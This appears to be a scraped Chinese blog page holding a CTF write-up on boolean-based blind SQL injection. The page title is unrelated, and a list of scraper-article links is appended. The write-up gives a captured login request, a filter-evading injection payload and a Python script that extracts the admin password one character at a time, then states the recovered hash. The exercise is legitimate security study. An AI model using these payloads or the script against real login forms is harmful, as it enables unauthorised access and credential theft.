2. 程式人生 > 其它 >爬取彼岸網非原圖

爬取彼岸網非原圖

阿新 發佈:2020-12-24

技術標籤:WEB安全安全滲透測試php

文章目錄

前言

[CTF學習]基於布林的SQL盲注

一、題目

提  示: 基於布林的SQL盲注
描  述: sql注入

訪問題目,又是一個web login登陸介面,根據提示可以大概猜測是一個sql post注入題。

二、解題步驟

1.bp抓包

POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/
 
20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-
 
urlencoded
Content-Length: 79

username=admin&password=123
#當username=admin時提示password error
#可知使用者名稱為 admin
#對username進行注入時,發現<>=都被過濾了,不過or沒有被過濾
#我這邊使用username=a'or(1) or(0)%23 進行sql注入判斷
#將使用者名稱故意輸錯來獲得回顯判斷

構造payload

username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=
 
123

2、python指令碼

import requests
import time

url = "http://pandarking.ctf:10965/index.php"
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    for i in range(1,32):
        for j in range(48,128):
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i,j)
            
            data = {'username':sql,'password':"123"}
            try:
                res = s.post(url,data=data,timeout=5,headers=headers)
            except:
                time.sleep(2)
                res = s.post(url,data=data,timeout=5,headers=headers)
            if 'username does not exist' in res.text:                
                database += chr(j)
                print(database)
                break
            res.close()
 
#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a

3、登陸後臺得到flag

謝謝觀看

相關推薦

彼岸

技術標籤:xpathpython 新手第一次寫爬蟲指令碼 import requests from lxml import etree import os

Python爬蟲實現使用beautifulSoup4名言功能案例

本文例項講述了Python爬蟲實現使用beautifulSoup4名言功能。分享給大家供大家參考,具體如下:

Python利用Xpath選擇器京東商品資訊

HTML檔案其實就是由一組尖括號構成的標籤組織起來的,每一對尖括號形式一個標籤,標籤之間存在上下關係,形成標籤樹;XPath 使用路徑表示式在 XML 文件中選取節點。節點是通過沿著路徑或者 step 來選取的。

Python CSS選擇器京東商品資訊過程解析

CSS選擇器 目前,除了官方文件之外,市面上及網路詳細介紹BeautifulSoup使用的技術書籍和部落格軟文並不多,而在這僅有的資料中介紹CSS選擇器的少之又少。在網路爬蟲的頁面解析中,CCS選擇器實際上是一把效率甚高的利

Python招聘資訊

1、資料來源:職友集 2、程式碼 import requests import openpyxl import time from bs4 import BeautifulSoup #用於解析和提取網頁資料的

段子

,好久沒寫爬蟲程式碼了,最近看上了段子,終於還是對它下手了。廢話不多說,上程式碼。

天氣全國所有縣市的天氣資料,讓你異地的女朋友記得帶傘!

所要用到的庫 import requests from lxml import etree import xlwt 123 訪問URL 這裡我們要用xpath來解析資料,所以我們返回的網頁資料格式為html沒學過xpath的可以看看這篇部落格,寫的還是很詳細的xpath連結http

python爬蟲實踐 今日頭條街拍 (參考了python3webspider和github上的程式碼)

import requests from urllib.parse import urlencode from requests import codes import os from hashlib import md5

Python噹噹APP資料

本文的文字及圖片來源於網路,僅供學習、交流使用,不具有任何商業用途,版權歸原作者所有,如有問題請及時聯絡我們以作處理

python入門——中技技術需求並存儲入mysql資料庫

一、開啟中技網站   右鍵檢查,找到可以進入二級網頁即各個需求詳情的入口,如

比比中標標書,並儲存為PDF格式檔案

前言 本文的文字及圖片來源於網路,僅供學習、交流使用,不具有任何商業用途,如有問題請及時聯絡我們以作處理。

python利用BeautifulSoup瓜子內容並儲存在csv檔案

這裡需要匯入requests庫和BeautifulSoup庫和lxml庫 lxml是python的一個解析庫,支援HTML和XML的解析,支援XPath解析方式,而且解析效率非常高

爬蟲筆記(三)‘糗事百科’熱板塊所有

目的:‘糗事百科’熱板塊所有 在網頁response中可以發現,每個是一個沒有http開頭的、以.jpg結尾的連結,在這個連結前邊補上http可以成功訪問該圖片。

python spider - 噹噹好評榜TOP200的圖書資訊

import requests, re, json def request_dangdang(url): try: response = requests.get(url) if response.status_code == 200:

Python爬蟲入門案例教學:批量彼岸桌面4K超清美女桌布

先圖片開路 環境介紹 python 3.6 / 3.8 pycharm 編輯器 requests parsel os 檔案操作在cmd裡面就可以進行安裝 pip install requests

scrapy+selenium馬蜂窩實戰

剛開始學習selenium動態網頁的爬蟲,就想著自己做個實戰練習練習,然後就準備爬取馬蜂窩旅遊重慶的全部旅遊景點,本來以為不是特別難,沒想到中間還是出現了很多問題,包括重寫下載中介軟體,加cookies,selenium

Python手把手教你噹噹五星好評書籍,拿走不謝

來啦,老弟 python 我們已經知道怎麼使用 Requests 進行各種請求騷操作 也知道了對伺服器返回的資料如何使用

手把手教你用Python小說資料,並進行視覺化分析

網路文學是以網際網路為展示平臺和傳播媒介,藉助相關網際網路手段來表現文學作品及含有一部分文字作品的網路技術產品,在當前成為一種新興的文學現象,並快速興起,各種網路小說也是層出不窮,今天我們使用seleniu

實操 | 從0到1教你用Python來整站天氣

Scrapy Scrapy是Python開發的一個快速、高層次的螢幕抓和web抓框架,用於抓web站點並從頁面中提取結構化的資料。

用 Python 易嚴選妹子內衣資訊,探究妹紙們的偏好

今天繼續來分析爬蟲資料分析文章,一起來看看易嚴選商品評論的獲取和分析。